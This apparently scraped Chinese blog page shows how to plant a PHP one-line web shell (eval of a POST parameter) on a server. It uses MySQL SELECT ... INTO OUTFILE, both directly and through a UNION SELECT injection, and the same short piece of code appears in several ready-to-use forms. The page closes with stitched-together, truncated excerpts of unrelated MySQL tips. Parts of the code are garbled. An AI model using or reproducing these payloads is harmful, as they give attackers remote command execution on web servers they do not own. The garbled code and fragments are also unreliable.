drop table if exists temp; //如果存在temp就刪掉
create table temp(cmd text not null); //建立temp表,裡面就乙個cmd欄位
insert into temp (cmd) values(' php eval($_post[cmd]);?>'); //把一句話木馬插入到temp表
select cmd from temp into out file 'd:/wwwroot/1.php'; //查詢temp表中的一句話並把結果匯入到eval.php
drop table if exists temp; //刪除temp
方法2:直接select 查詢匯出一句話
select ' php eval($_post[cmd]);?>' into outfile 'd:/phpstudy/wwww/1.php';
這樣做簡潔明瞭,沒那麼多廢話。不知道網上的方法要操作那麼複雜(建表-插入資料-最後從表中匯出資料),真心複雜!!!
MySQL一句話小經驗
mysql 資料庫登入名稱 似乎不能用中文,中文名在mysql workbench中設定許可權時總會出錯。mysql儲存過程的引數名不要跟欄位名一樣 切記,否則可能出現嚴重後果。我習慣引數名前面加個p.比如這樣一句,where guid guid 就是嚴重的作死節奏,輕則通不過,不能執行 當set ...
一句話介紹MySQL 1
例子在這裡 連線資料庫 shell mysql h host u user p 退出資料庫 mysql quit 查詢版本號和當前日期 mysql select version current date 查詢使用者 mysql select user 找出伺服器上當前存在的資料庫 mysql sho...
MYSQL寫入一句話的方式
一 union select 後寫入 最常見的寫入方式,union select 後跟 into outfile 語句 1 union select 1,2,into outfile c phpstudy phptutorial www shell.php 1 union select 1,2,in...